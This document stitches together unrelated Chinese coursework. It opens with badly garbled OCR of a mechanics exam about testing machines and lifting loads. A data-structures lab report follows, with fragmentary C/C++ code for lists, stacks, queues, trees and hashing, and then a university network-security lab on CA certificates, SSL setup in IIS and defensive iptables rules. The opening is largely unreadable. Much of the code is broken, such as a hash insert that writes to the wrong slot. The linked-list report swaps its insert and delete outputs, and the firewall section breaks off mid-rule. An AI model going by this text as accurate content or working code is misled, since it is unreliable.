2.河冃冰验机育丄呃虫、沁队 2Ukfl, WkK 四”|不同量程的设备理有试件言径为沁.陆选用 昼程的過餐囲亍拉坤破薛实也 lOOkN bOkb 20kN 1iM..A J.[C: 4. 饥 /T2 萌-加 07 标桂舰定试蒔吸收能量忆不应超惟实际初始势罷用戸的 玉 Kf 轩--------的 ___________ 倍「 m ; 最小分祈力, 25 程绘构在承受交变敦荷作用下导致裂纹萌主和扩展臥至断裂失效‘称之为 实验报告 1.I~ 用避 *1 移动虽籾尸.対压所习ii 上牡仃 W 韭殖崔魁両上此正口严」 3 些虫叠丿 1 地曲吐打」淡世也他上胡巧应力旳 ffj=;亶則阳刊:』連度。下膵叭匐懵嗽面上甫应力湘矶严 ______________.f(商三的间用冠的骨号“:‛為卄: I B 解=当重输句宦上 n 七 当重物匀加谨上升时.心十育.此対盘討是一个人的系載,结黒造成向上加連梶汁时乖要施加 比童物如自重更大的力.即: 0 尸 K/ 計 =<1 斗弓防 e 当童输句 in 速下晦寸,K 尸 1-空.此时 K 屣一个小于 1 的系拠绘杲适成向下加速运行时日施协 比童恂的自娈更 4 嵌力*职 %=K# 阳 =(1 晋〕 [7 S 2.I~ 用堇量为&鬪扭重设舊.再重量対尸的重精以勾如釀甬上强升,不讣巣的自亜.剛架丄的最才唾題”址^二 ______________ ° 阳.此可趣中毡夷事両 i、玉校.H 丰起蓋设备吏莊 I L SI 史架上,it 于薛止干动的状弟,因此,越賣设膏只能按關静 Jt/kil 耳』械起吊的畫㈱向 上收口池瓏克拽运动,0 烦證虏甚內荷麹应・ 早斤:霰戈百护卢牛在金#由益盂迓科-很記吊專孟一产牛餐命務沪订| F My 呼矶胃 前荷冋轴』 d^ fl ~] + — 扔 也鬧 W +陆严 fl 林心 竽申+讣晋 3.标唯神击就樟申间有 型和 坐两种缺□“室渥神兰武验应在 溟崖范围内进行疲劳失效 5. 23°C 土亍 C 4.百啊 J 件妇理土姿出事有、杓 解;构件外形;构件尺寸; 船 I 彳牛夷高馬量; 数据结构实验报告 专业班级: 指导老师:余腊生 姓 名: 学 号: 实验一 单链表的基本操作的实现 一、实验目的 掌握单链表的基本操作:建立、插入、删除、查找等运算。 二、实验仪器 安装VC++的PC机。 三、实验原理 利用线性表的特性以及其链式存储结构特点对线性表进行相关操作。 四、实验内容 程序中演示了单链表的创建、插入、删除和查找。程序如下: #include scanf(“%d”,&x);while(x!=-1){ p=(NODE *)malloc(sizeof(NODE));p->data=x;p->next=head->next;head->next=p;scanf(“%d”,&x);} return(head);} /******************************************/ void Output(NODE *head){ NODE *p;p=head;printf(“Begin to dump the LinkList...n”);while(p->next!=NULL){ printf(“->%d”,p->next->data);p=p->next;} printf(“nThe LinkList ended!n”);} /******************************************/ int Listlen(NODE *head){ int i=0;NODE *p=head;while(p->next!=NULL){ i++;p=p->next;} return(i);} /******************************************/ int Get(NODE *head,int i){ int j=0;NODE *p=head;while(p->next&&j 五、数据记录及处理 1、运行程序,输入下面一组数据: 93 94 12 13 20 14 链表顺序:14 20 13 12 94 93 2、删除第二个数据结点,在第一个位置插入数据20。 运行结果如下: 插入结果:14 13 12 94 93 删除结果:20 14 13 12 94 93 运行结果截图: 实验二 栈和队列的实现 一、目的和要求 1.理解队列和栈的顺序存储结构和链式存储结构。通过本实验,熟悉队列、栈的结构特点; 2.熟悉队列、栈结构上的操作与算法的实现。 二、实验内容 1.队列的基本操作和应用。2.栈的基本操作和应用。 三、仪器、设备和材料 1.适合实验要求的计算机系统。2.VC++编程平台。 四、实验原理 队列与栈是一种操作受限制的线性表,在了解线性表的基本原理的基础上,理解与完成此项实验。 五、实验步骤 1.采用队列的顺序存储结构。 2.用菜单的形式完成队列的建立,出队,入队等基本操作。3.采用栈的链式存储结构。 4.用菜单的形式完成栈的出栈、入栈等基本操作。 六、程序算法 #include SElemType *top;}SqStack; SqStack InitStacka()//顺序存储实现栈的初始化 {SqStack S;S.base=(SElemType *)malloc(MAX*sizeof(SElemType));if(!S.base)exit(OVERFLOW);S.top=S.base;return(S);} void Pusha(SqStack &S,int x)//顺序存储实现栈的入栈操作 {if(S.top-S.base>=MAX)exit(OVERFLOW);*S.top++=x;} void Popa(SqStack &S)//顺序存储实现栈的出栈操作 {SElemType *p;int x;if(S.top==S.base)return;else {p=S.top;x=*--S.top;printf(“t删除的栈顶元素是%dnt出栈操作完成后的栈为:n”,x);} } void printa(SqStack S)//输出 {SElemType *p;p=S.base;printf(“t”);while(p!=S.top){printf(“%d ”,*(p++));} printf(“n”);} typedef struct SqNode {SElemType data;SqNode *Link;}*Sqptr,NODE;typedef struct {Sqptr top;}Stack; Stack InitStackb()//链式存储实现栈的初始化 {Stack S;S.top=(Sqptr)malloc(sizeof(NODE));if(!S.top)exit(OVERFLOW);S.top->Link=NULL;return(S);} void Pushb(Stack &S,int x)//链式存储实现栈的入栈操作 {Sqptr p;p=(Sqptr)malloc(sizeof(NODE));if(!p)return;p->data=x;p->Link=S.top->Link;S.top->Link=p;} void Popb(Stack &S)//链式存储实现栈的出栈操作 {int x;Sqptr p;if(S.top->Link==NULL)return;else {p=S.top->Link; x=p->data; S.top->Link=p->Link; printf(“t删除的栈顶元素是%dn”,x); free(p);} } typedef struct QNode {QElemType data;struct QNode *next;}*QueuePtr,QNode;typedef struct {QueuePtr front;QueuePtr rear;}LinkQueue;LinkQueue InitQueue()//链式存储实现队列的初始化 {LinkQueue Q;Q.front=Q.rear=(QueuePtr)malloc(sizeof(QNode));if(!Q.front)exit(OVERFLOW);Q.front->next=NULL; return(Q);} void EnQueue(LinkQueue &Q,QElemType x)//链式存储实现队列的入队 {QueuePtr p;p=(QueuePtr)malloc(sizeof(QNode));if(!p)exit(OVERFLOW);p->data=x;p->next=NULL;Q.rear->next=p;Q.rear=p;} void DeQueue(LinkQueue &Q)//链式存储实现队列的出队 {int x;if(Q.front==Q.rear)return;QueuePtr p;p=Q.front->next;x=p->data;printf(“t删除的队头元素是:%dn”,x);Q.front->next=p->next;if(Q.rear==p)Q.rear=Q.front;free(p);return;} typedef struct {SElemType *base;int front,rear;}SqQueue;SqQueue InitQueueb()//顺序存储实现队列的初始化 {SqQueue S;S.base=(SElemType *)malloc(MAX*sizeof(SElemType));if(!S.base)exit(OVERFLOW);S.front=S.rear=0;return(S);} void EnQueueb(SqQueue &S,int x) //顺序存储实现队列的入队 {if((S.rear+1)%MAX==S.front)return;S.base[S.rear]=x;S.rear=(S.rear+1)%MAX;} void DeQueueb(SqQueue &S)//顺序存储实现队列的出队 {int x;if(S.front==S.rear)return;x=S.base[S.front];S.front=(S.front+1)%MAX;printf(“t删除的队头元素是:%dn”,x);} void main(){int choice;int n,x;printf(“nn”);printf(“t1.采用链式存储实现栈的初始化、入栈、出栈操作n”);printf(“t2.采用顺序存储实现栈的初始化、入栈、出栈操作n”);printf(“t3.采用链式存储实现队列的初始化、入队、出队操作n”);printf(“t4.采用顺序存储实现队列的初始化、入队、出队操作n”);printf(“t请选择:”);scanf(“%d”,&choice);switch(choice){case 1:Stack Sa; printf(“t1.链式存储实现栈的初始化n”); printf(“t2.链式存储实现栈的入栈操作n”); printf(“t3.链式存储实现栈的出栈操作n”); while(1){ printf(“t请选择:”); scanf(“%d”,&n); switch(n) {case 1:Sa=InitStackb(); printf(“t链式存储栈的初始化完成!n”);break; case 2:printf(“t以'0'结束n”);printf(“t”); scanf(“%d”,&x); while(x){ Pushb(Sa,x);scanf(“%d”,&x);} printf(“t链式存储栈的入栈操作完成!n”);break; case 3:Popb(Sa);break;}}break; case 2:SqStack S; printf(“t1.顺序存储实现栈的初始化n”); printf(“t2.顺序存储实现栈的入栈操作n”); printf(“t3.顺序存储实现栈的出栈操作n”); while(1){ printf(“t请选择:”); scanf(“%d”,&n); switch(n) { case 1:S=InitStacka(); printf(“t顺序存储栈的初始化完成!n”);break; case 2:printf(“t以'0'结束n”); printf(“t”); scanf(“%d”,&x); while(x){ Pusha(S,x); scanf(“%d”,&x);} printf(“t顺序存储栈的入栈操作完成!n”); printa(S);break; case 3:Popa(S); printa(S);break;}}break; case 3:LinkQueue Q; printf(“t1.链式存储实现队的初始化n”); printf(“t2.链式存储实现队的入栈操作n”); printf(“t3.链式存储实现队的出栈操作n”); while(1){ printf(“t请选择:”); scanf(“%d”,&n); switch(n) { case 1:Q=InitQueue(); printf(“t链式存储队的初始化完成!n”);break; case 2:printf(“t以'0'结束n”);printf(“t”);scanf(“%d”,&x); while(x){ EnQueue(Q,x);scanf(“%d”,&x);} printf(“t链式存储队的入栈操作完成!n”);break; case 3:DeQueue(Q);break;}}break; case 4:SqQueue Sv; printf(“t1.顺序存储实现队的初始化n”); printf(“t2.顺序存储实现队的入栈操作n”); printf(“t3.顺序存储实现队的出栈操作n”); while(1){ printf(“t请选择:”); scanf(“%d”,&n); switch(n) {case 1:Sv=InitQueueb(); printf(“t链式存储栈的初始化完成!n”);break; case 2:printf(“t以'0'结束n”);printf(“t”);scanf(“%d”,&x); while(x){ EnQueueb(Sv,x);scanf(“%d”,&x);} printf(“t链式存储栈的入栈操作完成!n”);break; case 3: DeQueueb(Sv);break;}}break;} } 程序调试截图: 1.采用链式存储实现栈的初始化、入栈、出栈操作 2.采用顺序存储实现栈的初始化、入栈、出栈操作 3.采用链式存储实现队列的初始化、入队、出队操作 4.采用顺序存储实现队列的初始化、入队、出队操作 七、心得体会 实践才能出真知,在通过了上机操作后,才发现了许多在平时上理论课的时候没有想到的方方面面,编写程序时发现很多语法的错误,以及很多英语单词的记不熟,记错,程序函数错用等等,我想需要在以后多多练习,才能逐步解决这些问题。实验三 二叉树的建立和遍历 一、目的和要求 1、了解二叉树的建立的方法及其遍历的顺序,熟悉二叉树的三种遍历 2、检验输入的数据是否可以构成一颗二叉树 二、实验内容 1.二叉树的建立和遍历 三、仪器、设备和材料 1.适合实验要求的计算机系统。2.VC++编程平台。 四、实验的描述和算法 1、实验描述 二叉树的建立首先要建立一个二叉链表的结构体,包含根节点和左右子树。因为耳熟的每一个左右子树又是一颗二叉树,所以可以用递归的方法来建立其左右子树。二叉树的遍历是一种把二叉树的每一个节点访问完并输出的过程,遍历时根结点与左右孩子的输出顺序构成了不同的遍历方法,这个过程需要按照不同的遍历的方法,先输出根结点还是先输出左右孩子,可以用选择语句实现。 2、算法 #include //二叉树结点类定义 { T data; //数据域 BinTreeNode //左子女、右子女域 BinTreeNode(T x=T(),BinTreeNode :data(x),leftChild(l),rightChild(r){} //可选择参数的默认构造函数 };//-----------template //非递归前序遍历 { stack while(p!=NULL) { cout< data; //访问根结点 S.push(p); p=p->leftChild; //遍历指针进到左子女结点 } if(!S.empty()) //栈不空时退栈 { p=S.top(); S.pop(); p = p->rightChild; //遍历指针进到右子女结点 } } } //--template //非递归中序遍历 { stack while(p!=NULL) //遍历指针未到最左下的结点,不空 { S.push(p); p=p->leftChild; } if(!S.empty()) //栈不空时退栈 { p=S.top(); S.pop(); cout< data; p=p->rightChild; } } while(p!=NULL ||!S.empty());} //----template while(p!= NULL ||!S.empty()) //左子树经过结点加L进栈 { while(p!=NULL) { S.push(p);//首先将t和tag为入栈,遍历左子树 tag.push(0);//遍历左子树前的现场保护 p=p->leftChild; } while(!S.empty()&& tag.top()==1) { p=S.top(); S.pop(); tag.pop(); cout< data;//最后访问根结点。 } if(!S.empty()) { tag.pop(); tag.push(1);//遍历右子树前的现场保护,修改栈顶tag为,遍历右子树 p=S.top(); // 取栈顶保存的指针 p=p->rightChild; } else break; } } template if(subTree!=NULL) //NULL是递归终止条件 { InOrder_1(subTree->leftChild);//中序遍历根的左子树 cout< //访问根结点 InOrder_1(subTree->rightChild);//中序遍历根的右子树 } } template //递归结束条件 { cout< PreOrder_1(subTree->leftChild); //前序遍历根的左子树 PreOrder_1(subTree->rightChild); //前序遍历根的右子树 } } template if(subTree!=NULL) //NULL是递归终止条件 { PostOrder_1(subTree->leftChild);//后序遍历根的左子树 PostOrder_1(subTree->rightChild);//后序遍历根的右子树 cout< //访问根结点 } } //------------template T item; cin>>item; if(item!=-1) { subTree = new BinTreeNode if(subTree == NULL) { cerr<<“存储分配错!”< exit(1); } subTree->data = item; CreateBinTree(subTree->leftChild);//递归建立左子树 CreateBinTree(subTree->rightChild);//递归建立右子树 } else subTree = NULL; //封闭指向空子树的指针 } int main(){ BinTreeNode cout<<“先序遍历二叉树结果:”; PreOrder_1(Tree); cout< cout<<“后序遍历二叉树结果:”; PostOrder_1(Tree);cout< cout<<“非递归中序遍历二叉树结果:”;InOrder_2(Tree);cout< 3、实验程序运行截图 实验四 散列法查找和排序 一、目的和要求 1.用散列法实现顺序查找,折半查找。 二、仪器、设备和材料 1.适合实验要求的计算机系统。2.VC++编程平台。 三、实验步骤 和程序 1、顺序查找 #include #define NULLKEY 0 typedef int KeyType; /* 假设关键字为整型 */ typedef struct { KeyType key;}RecordType;typedef RecordType HashTable[m];int hash(KeyType k)/*除留余数法构造哈希函数*/ { int h;h = k%m;return h;} int HashSearch(HashTable ht, KeyType K)/*哈希查找*/ { int h0;int i;int hi;h0=hash(K);if(ht[h0].key==NULLKEY) return(-1);else if(ht[h0].key==K) return(h0); else /* 用线性探测再散列解决冲突 */ { for(i=1;i<=m-1;i++) { hi=(h0+i)% m; if(ht[hi].key==NULLKEY) return(-1); else if(ht[hi].key==K) return(hi); } return(-1); } } void main(){ int i,j;int n;int p;int hj;int k;int result;HashTable ht;for(i=0;i ht[i].key = NULLKEY;printf(“请输入哈希表的元素个数:”);scanf(“%d”,&n);for(i=1;i<=n;i++){ printf(“请输入第%d个元素:”,i); fflush(stdin); scanf(“%d”,&p); j = hash(p); if(ht[j].key == NULLKEY) ht[j].key = p; else { for(i=1;i<=m-1;i++) { hj=(j+i)% m; if(ht[hj].key==NULLKEY) { ht[j].key = p; } i = m; } } } } printf(“请输入要查找的元素:”);fflush(stdin);scanf(“%d”,&k);result = HashSearch(ht,k);if(result ==-1)printf(“未找到!n”);else printf(“元素位置为%dn”,result);system(“pause”);运行结果如下: 2、折半查找 #include printf(“你输入的数不正确,请重新输入:n”); printf(“你想在多少个数中进行折半查找,请输入(1--20):”); scanf(“%d”,&n);} printf(“请你输入一个整数a[1]:”);scanf(“%d”,&a[1]);i=2;while(i<=n){ printf(“请你输入一个整数a[%d]:”,i); scanf(“%d”,&a[i]); i++;} printf(“n输出表列n”);for(i=1;i<=n;i++){ printf(“%6d”,a[i]);} printf(“n”);printf(“请你输入要查找的数:”);scanf(“%d”,&num);flag=1;top=n;bottom=1;mid=(top+bottom)/2;while(flag){ printf(“top=%d,bottom=%d,mid=%d,a[i]=%dn”,top,bottom,mid,mid,a[mid]);if((num>a[top])||(num loc=-1; flag=0;} else if(a[mid]==num){ loc=mid; printf(“找到数 %6d的位置%2dn”,num,loc); break;} else if(a[mid]>num){ top=mid-1; mid=(top+bottom)/2;} else if(a[mid] bottom=mid+1; mid=(top+bottom)/2;} } if(loc==-1){ printf(“%d这个数在表列中没有找到。n”,num);} } 运行结果如下: CENTRAL SOUTH UNIVERSITY 网 络 安 全 实 验 报 告 学生姓名 专业班级 学 号 学 院 信息科学与工程学院 指导教师 刘嫔 实验时间 2014年12月 实验一 CA证书与SSL连接 应用场景 在访问Web 站点时,如果没有较强的安全措施,用户访问的数据是可以使用网络工具 捕获并分析出来的。在Web 站点的身份验证中,有一种基本身份验证,要求用户访问输入 用户名和密码时,是以明文形式发送密码的,蓄意破坏安全性的人可以使用协议分析程序破 译出用户名和密码。那我们该如果避免呢?可利用SSL 通信协议,在Web 服务器上启用安 全通道以实现高安全性。 SSL 协议位于TCP/IP 协议与各种应用层协议之间,为数据通讯提供安全支持。SSL 协 议可分为两层: SSL 记录协议(SSL Record Protocol):它建立在可靠的传输协议(如TCP)之上,为高层协议提供数据封装、压缩、加密等基本功能的支持。SSL 握手协议(SSL Handshake Protocol):它建立在SSL 记录协议之上,用于在实际的数据传输开始前,通讯双 方进行身份认证、协商加密算法、交换加密密钥等。每一个Windows Server 2003 证书颁发 机构都有可供用户和管理员使用的网页。 实验目标 掌握在Windows Server 2003 下独立根CA 的安装和使用。使用WEB 方式申请证书和安装证书。建立SSL 网站。 分析SSL 网站的数据包特点。 实验拓扑 VM Client VM Server 实验环境 虚拟机:Windows Server 2003,Windows XP,Wireshark 抓包软件。 实验过程指导 任务一:windows server 2003 环境下独立根CA 的安装及使用 1、启动Windows Server 2003 和Windows XP,配置其IP,使其在同一局域网网段。 2、在Windows Server 2003 中,选择【开始】|【控制面板】|【添加和删除程序】,在弹出窗 口中选择【添加和删除windows 组件】,在【组件】列表框中选择【证书服务】,再单击【下 一步】按钮,如下图所示。 3、在弹出的窗口中选择【独立根CA】单选按钮,单击【下一步】按钮,在弹出窗口中按 要求依次填入CA 所要求的信息,单击【下一步】按钮,如下图所示。 4、继续选择【证书数据库】、【数据库日志】和配置信息的安装、存放路径,如下图所示。 单击【下一步】按钮。安装的时候,可能会弹出如下窗口,为了实验方便,已经把I386 文 件夹复制到C:下,选择【浏览】,选择文件夹“C:I386”,点【确定】,完成安装。 5、选择【开始】|【程序】|【管理工具】,可以找到【证书颁发机构】,说明CA 的安装已经 完成,如下图所示。 6、从同一局域网中的另外一台XP 开启IE 浏览器,输入http://windows2003 的IP/certsrv/, 选中【申请一个证书】,如下图所示,在弹出的页面中选择【web 浏览器证书】。 7、在弹出窗口中填写用户的身份信息,完成后进行【提交】。此种情况下,IE 浏览器采用 默认的加密算法生成公钥对,私钥保存在本地计算机中,公钥和用户身份信息按照标准的格式发给CA 服务器,如图所示,单击【是】,进入下一步。CA 服务器响应后,弹出证书申请 成功页面,如下图所示。 8、在根CA 所在的计算机上,选择【开始】|【程序】|【管理工具】|【证书颁发机构】,上 面申请的证书便会出现在窗口右边,选择证书单击右键,选择【所有任务】|【颁发】,进行 证书颁发,如下图所示。证书颁发后将从【挂起的申请】文件夹转入【颁发的证书】文件夹 中,表示证书颁发完成。 9、在申请证书的计算机上打开IE,输入http://windows2003 的IP/certsrv/,进入证书申请页 面,选择【查看挂起的证书申请状态】,弹出的页面中选择一个已经提交的证书申请,如下 图所示。选择安装此证书。 10、现在验证此CA 系统颁发的新证书是否可信,为此需要安装CA 系统的根证书,进入证书申请主页面,选择当前的CA 证书进行下载,并保存到合适路径,如下图所示。 11、下载完毕之后,在证书的保存目录中查看证书信息,单击【安装证书】按钮,进入证书 导入向导,按照默认的配置完成证书的导入,导入成功后,单击【确定】按钮,之后完成。 任务二:基于Web 的SSL 连接设置 1、在XP 中,左下角【开始】,打开【Wireshark】,并点击开始抓包的按钮。打开IE 浏览器,输入网址http://windows2003 的IP/?id=1(比如:http://192.168.1.130/?id=1),然后保存Wireshark的抓包结果1。 2、选择【开始】|【程序】|【管理工具】|【IIS(Internet 信息服务)管理器】,在弹出窗口 右键单击【默认网站】,弹出的快捷菜单中选择【属性】选项,如下图所示。 3、在弹出窗口内选择【目录安全性】标签,单击【安全通信】中的【服务器证书】按钮,如下图所示。 4、弹出【IIS 证书向导】窗口,选中【新建证书】复选项,一直单击【下一步】按钮,输入自定义的名称,如下图所示。填写相应的信息后,单击【下一步】按钮。 5、弹出【请求文件摘要】窗口,确认后单击【下一步】按钮,接着单击【完成】按钮,完 成服务器端证书配置,如下图所示。 6、打开IE 浏览器(windows2003 中的),进入证书申请主界面,如下图所示。 7、在出现的网页中选择【高级证书申请】,如图所示,在出现的网页中单击第二个选项【base64 编码】。打开刚才IIS 证书向导生成的请求文件,(默认路径C:certreq.txt),复制并粘贴文件 内容到第一个文本框,如下图所示,单击【提交】按钮,转到完成提交后的页面。 8、回到首页,选择【查看挂起的证书申请状态】,弹出的页面中选择一个已经提交的证书申 请,如下图所示。选择【Base 64 编码】,点击【下载证书】,【保存】certnew.cer 文件到桌面。 9、选择【开始】|【程序】|【管理工具】|【IIS(Internet 信息服务)管理器】,在弹出窗口 右键单击【默认网站】,弹出的快捷菜单中选择【属性】选项,在弹出窗口内选择【目录安 全性】标签,选择【服务器证书】,选择【下一步】,【处理挂起的请求并安装证书】选择【下 一步】,【浏览】选择刚才保存的certnew.cer 文件,如下图所示。【下一步】【下一步】【完成】。 10、还是在【目录安全性】下,选择【安全通信】下的【编辑】,在下如图所示的弹出窗口 中选中【要求安全通道(SSL)】复选项,并在【客户端证书】栏中选中【接受客户端证书】 复选项,再单击【确定】按钮。返回【目录安全性】面板,单击【应用】按钮及【确定】按 钮,完成配置。 11、在XP 系统打开浏览器,输入服务器IP 地址,进入证书申请主页面,此时会显示错误 信息页面,要求采用https 的方式连接服务器,如图所示。 12、把http 改成https 继续访问,此时浏览器提示你要安装证书,安装完证书后,就可以正 常使用了。、再次打开Wireshark,并点击开始抓包的按钮。打开IE 浏览器,输入网址 https://windows2003 的IP/?id=1(比如:https://192.168.1.130/?id=1),然后保存Wireshark 的抓 包结果2。 14、分析比较抓包结果1 和抓包结果2 中,对IP/?id=1 请求处理的差异。 实验截图 1、写出windows server 2003 下独立根CA 的配置及应用的过程,将重要的步骤截图并保存。如上所示,重要的步骤截图已置于相应步骤下。 2、写出windows server 2003 下基于Web的SSL连接设置的过程,将重要的步骤截图并保存。如上所示,重要的步骤截图已置于相应步骤下。 实验心得 通过此次实验,我学会了Wireshark抓包的基本使用方法,学到了很多课本上没有的新知识,并对课本上的概念有了实际的更深的认识。通过Wireshark所抓到的未使用SSL 连接和使用SSL 连接的信息的对比,我对HTTPS有了一定的了解,对计算机网络通信中的数据传输安全有了大概的认识。 HTTPS(全称:Hyper Text Transfer Protocol over Secure Socket Layer),是以安全为目标的HTTP通道,简单讲是HTTP的安全版。即HTTP下加入SSL层,HTTPS的安全基础是SSL,因此加密的详细内容就需要SSL。它是一个URI scheme(抽象标识符体系),句法类同http:体系。用于安全的HTTP数据传输。https:URL表明它使用了HTTP,但HTTPS存在不同于HTTP的默 14 认端口及一个加密/身份验证层(在HTTP与TCP之间)。这个系统的最初研发由网景公司(Netscape)进行,并内置于其浏览器Netscape Navigator中,提供了身份验证与加密通讯方法。现在它被广泛用于万维网上安全敏感的通讯,例如交易支付方面。它的主要作用可以分为两种:一种是建立一个信息安全通道,来保证数据传输的安全;另一种就是确认网站的真实性,凡是使用了 https 的网站,都可以通过点击浏览器地址栏的锁头标志来查看网站认证之后的真实信息,也可以通过 CA 机构颁发的安全签章来查询。 Wireshark所抓到的未使用SSL 连接的http 信息,信息是明文传输,而使用SSL连接的https 则具有安全性的ssl加密传输协议,更加安全。 实验二 配置和管理主机防火墙 应用场景 对于Internet 上的系统,不管是什么情况,首先我们要明确一点:网络是不安全的。因此,虽然创建一个防火墙并不能保证系统100%安全,但却是绝对必要的。和社会上其它任何事物一样,Internet 经常会受到一些无聊的或者别有用心的人的干扰,防火墙的目的就是将这类人挡在你的网络之外,同时使你仍然可以完成自己的工作。 那么构筑怎样的Linux 防火墙系统才算是足够安全呢?这是一个很难回答的问题,因为不同的应用环境对安全的要求不一样。用一句比较恰当而且简单的话来回答这个问题:用户了解自己的Linux 系统和设置,并且可以很好地保护好自己的数据和机密文件的安全,这对于该计算机用户来说就可以称之为他的计算机有足够的安全性。 那么到底什么是防火墙呢?防火墙是一个或一组系统,它在网络之间执行访问控制策略。实现防火墙的实际方式各不相同,但是在原则上,防火墙可以被认为是这样一对机制:一种机制是拦阻传输流通行,另一种机制是允许传输流通过。一些防火墙偏重拦阻传输流的通行,而另一些防火墙则偏重允许传输流通过。了解有关防火墙的最重要的概念可能就是它实现了一种访问控制策略。 一般来说,防火墙在配置上是防止来自“外部”世界未经授权的交互式登录的。这大大有助于防止破坏者登录到你网络中的计算机上。一些设计更为精巧的防火墙可以防止来自外部的传输流进入内部,但又允许内部的用户可以自由地与外部通信。如果你切断防火墙的话,它可以保护你免受网络上任何类型的攻击。防火墙的另一个非常重要的特性是可以提供一个单独的“拦阻点”,在“拦阻点”上设置安全和审计检查。与计算机系统正受到某些人利用调制解调器拨入攻击的情况不同,防火墙可以发挥一种有效的“电话监听”和跟踪工具的作用。防火墙提供了一种重要的记录和审计功能;它们经常可以向管理员提供一些情况概要,提供有关通过防火墙的传输流的类型和数量,以及有多少次试图闯入防火墙的企图等信息。 因此本实验将介绍如何配置linux 防火墙。 VM Client VM Server 实验目标 1.掌握linux 下基本的iptables 知识 2.学会配置iptables VM Windows VM Linux 实验环境 虚拟机:linux,windowsXP;linux 主机用户名:root;密码:root 16 实验过程指导 一.Iptables 的规则表、链结构 1.规则表(iptables管理4个不同的规则表,其功能由独立的内核模块实现)filter 表:包含三个链INPUT OUTPUT FORWARD nat表:PREROUTING POSTROTING OUTPUT mangle 表:PREROUTING POSTROUTING INPUT OUTPUT FORWARD raw 表:OUTPUT PREROUTING 2.规则链 INPUT 链当收到访问防火墙本机的数据包(入站)时,应用此链中的规则 OUTPUT链当防火墙本机向外发送数据包(出站)时,应用此链中的规则 FORWARD链收到需要通过防火墙发送给其他地址的数据包,应用此链 PREROUTING链做路由选择之前,应用此链 POSTROUTING链对数据包做路由选择之后,应用此链中的规则 二.数据包的匹配流程 1.规则表之间的优先级 raw mangle nat filter 2.规则链之间的优先级 入站数据流向:来自外界的数据包到达防火墙,首先PREROUTING规则链处理(是否被修改地址),之后会进行路由选择(判断该数据包应该发往何处),如果数据包的目标地址是防火墙本机,那么内核将其传递给INPUT 链进行处理,通过以后再交给上次的应用程序进行响应。 转发数据流向:来自外界的数据包到达防火墙后,首先被PREROUTING 规则链处理,之后进行路由选择,如果数据包的目标地址是其他外部地址,则内核将其传递给FPRWARD 链进行处理,然后再交给POSTROUTIING 规则链(是否修改数据包的地址等)进行处理。 出站数据流向:防火墙本身向外部地址发送数据包,首先被OUTPUT 规则链处理,之后进行路由选择,然后交给POSTROUTING 规则链(是否修改数据包的地址等)进行处理。3.规则链内部各防火墙规则之间的优先顺序 依次按第1条规则、第2条规则、第3条规则„„的顺序进行处理,找到一条能够匹配的数据包规则,则不再继续检查后面的规则(使用LOG记录日志的规则例外)。如果找不到匹配规则,就按照规则链的默认策略进行处理。 三.管理和设置iptables规则 Iptables 的基本语法格式选项名-A-D-I-R 功能及特点 在指定链的末尾添加(--append)一条新规则 删除(--delete)指定链中的某一条规则,按规则序号或内容确定要删除的规则 在指定链中插入一条新规则,若未指定插入位置,则默认在链的开头插入 修改、替换指定链中的一条规则,按按 17-L-F-X-P-n-v-V-h--line-numbers-N 1.查看规则表 # iptables-L INPUT--line-numbers //查看filter表中INPUT链中的所有规则,同时显示各条规则的顺序号 规则序号或内容确定要替换的规则 列出指定链中所有的规则进行查看,若未指定链名,则列出表中所有链的内容 清空指定链中的所有规则,若未指定链名,则清空表中所有链的内容 删除表中用户自定义的规则链 设置指定链的默认策略(大p) 使用数字形式显示输出结果,如显示主机的IP地址而不是主机名 查看规则列表时显示详细的信息 查看iptables命令工具的版本信息 查看命令帮助信息 查看规则列表时,同时显示规则在链中的顺序号 新建一条用户自定义的规则链 2.删除、清空规则 # iptables-F //不指定表名时,默认情况filter表 3.设置规则链的默认策略 # iptables-t filter-P FORWARD DROP //将filter表中FORWARD规则的默认策略设为DROP # iptables-P OUTPUT ACCEPT //将filter表中OUTPUT规则的默认策略设为ACCEPT 18 四.条件匹配 1.通用(general)条件匹配(直接使用,而不依赖于其他的条件匹配及其扩展)协议匹配(允许使用的协议名包含在/etc/protocols文件中) # iptables-AINPUT-p icmp–j REJECT //拒绝进入防火墙的所有icmp数据包 地址匹配 拒绝转发来自192.168.1.11主机的数据,允许转发来自192.168.0./24网段的数据 # iptables-A FORWARD-s 192.168.1.11-j REJECT 2.隐含(implicit)条件匹配(需要指定的协议匹配为前提,其对应的功能由iptables自动(隐含)的装载入内核),如果无匹配条件,默认为REJECT。 端口匹配 仅允许系统管理员从202.13.0.0/16网段使用SSH方式远程登录防火墙主机 # iptables-A INPUT-p tcp--dport 22-s 202.13.0.0/16-j ACCEPT 五.在进行了上述规则讲解与熟悉之后,接下来的步骤进行防火墙规则配置与测试 禁止Windows主机ping防火墙linux主机,但是允许从防火墙上ping其他主机(允许接受ICMP回应数据) 1.配置linux防火墙主机ip地址,如下图所示: 2.配置windows 主机ip地址,如下图所示: 3.配置linux 主机防火墙规则,如下图所示: 4.在此在windows 主机和linux 主机上进行相互ping 测试,测试结果如下图所示: windows主机无法ping通linux防火墙主机,但是linux主机可以ping通windows主机。 实验截图 如上所示,重要的步骤截图已置于相应步骤下。 实验心得 1)如何在linux 主机上配置防火墙规则以防止DDOS 高级? 答:默认的iptables规则是无法过滤DDOS攻击数据的,我们需要添加过滤规则实现iptables拥有抗DDOS的能力: 屏蔽 SYN_RECV 的连接 -A FORWARD-p tcp-m tcp--tcp-flags FIN,SYN,RST,ACK SYN-m limit--limit 1/sec-j ACCEPT 限制IP碎片,每秒钟只允许100个碎片,用来防止DoS攻击-A FORWARD-f-m limit--limit 100/sec--limit-burst 100-j ACCEPT 限制ping包每秒一个,10个后重新开始 -A FORWARD-p icmp-m limit--limit 1/sec--limit-burst 10-j ACCEPT 限制ICMP包回应请求每秒一个 -A FORWARD-p icmp-m icmp--icmp-type 8-m limit--limit 1/sec-j ACCEPT 此处自定义一个表 -A FORWARD-j RH-Firewall-1-INPUT 完全接受 loopback interface 的封包-A RH-Firewall-1-INPUT-i lo-j ACCEPT 允许主机接受 ping-A RH-Firewall-1-INPUT-p icmp-m icmp--icmp-type any-j ACCEPT 允许连线出去后对方主机回应进来的封包 22-A RH-Firewall-1-INPUT-m state--state RELATED,ESTABLISHED-j ACCEPT 允许防火墙开启指定端口 -A RH-Firewall-1-INPUT-p tcp-m state--state NEW-m tcp--dport port-j ACCEPT 限制SSH登陆 只允许在***.***.***.***上使用ssh远程登录,从其它计算机上禁止使用ssh iptables-A INPUT-s ***.***.***.***-p tcp--dport 22-j ACCEPT iptables-A INPUT-p tcp--dport 22-j 